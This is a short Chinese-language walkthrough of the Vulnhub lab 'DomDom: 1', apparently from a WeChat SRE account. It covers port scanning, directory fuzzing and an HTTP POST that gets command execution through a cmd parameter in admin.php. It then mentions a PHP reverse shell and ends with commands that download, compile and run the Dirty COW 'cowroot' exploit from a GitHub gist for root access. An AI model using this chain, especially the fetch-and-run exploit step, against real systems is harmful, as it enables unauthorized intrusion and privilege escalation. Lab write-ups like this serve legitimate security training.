主机层面扫描:

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

╰─ nmap -p1-65535 -A -sV 10.10.202.140

DomDom: 1 Vulnhub Walkthrough Safe 第1张

DomDom: 1 Vulnhub Walkthrough Safe 第2张

You name 存在XSS 漏洞

DomDom: 1 Vulnhub Walkthrough Safe 第3张

右键源码有隐藏form表单

DomDom: 1 Vulnhub Walkthrough Safe 第4张

修改其type属性为:text

DomDom: 1 Vulnhub Walkthrough Safe 第5张

尝试了SQL注入貌似无注入

wfuzz 下目录试试

+ http://10.10.202.140/admin.php (CODE:200|SIZE:329)
+ http://10.10.202.140/index.php (CODE:200|SIZE:694)
+ http://10.10.202.140/server-status (CODE:403|SIZE:301)

http://10.10.202.140/admin.php

Welcome to DomDom !

You need to know it's your actions that will show you the light.

我们尝试POST数据到admin.php接口

DomDom: 1 Vulnhub Walkthrough Safe 第6张

DomDom: 1 Vulnhub Walkthrough Safe 第7张

DomDom: 1 Vulnhub Walkthrough Safe 第8张

DomDom: 1 Vulnhub Walkthrough Safe 第9张

看到这个界面,试试能不能执行系统命令

DomDom: 1 Vulnhub Walkthrough Safe 第10张

不知道没执行还是没回显到前台来,我们尝试把参数加到boday中去

POST /admin.php HTTP/1.1
Host: 10.10.202.140
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

name=admin&username=admin&password=admin&access=access&cmd=id

DomDom: 1 Vulnhub Walkthrough Safe 第11张

 

看来RCE是可以执行的,我们尝试下载远程php-resver.php 试试

DomDom: 1 Vulnhub Walkthrough Safe 第12张

http://10.10.202.140/php-reverse.php

DomDom: 1 Vulnhub Walkthrough Safe 第13张

进行提权操作:

DomDom: 1 Vulnhub Walkthrough Safe 第14张

DomDom: 1 Vulnhub Walkthrough Safe 第15张

 

$ wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c

$ gcc cowroot.c -o cowroot -pthread

$ ./cowroot

DomDom: 1 Vulnhub Walkthrough Safe 第16张

完结!

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄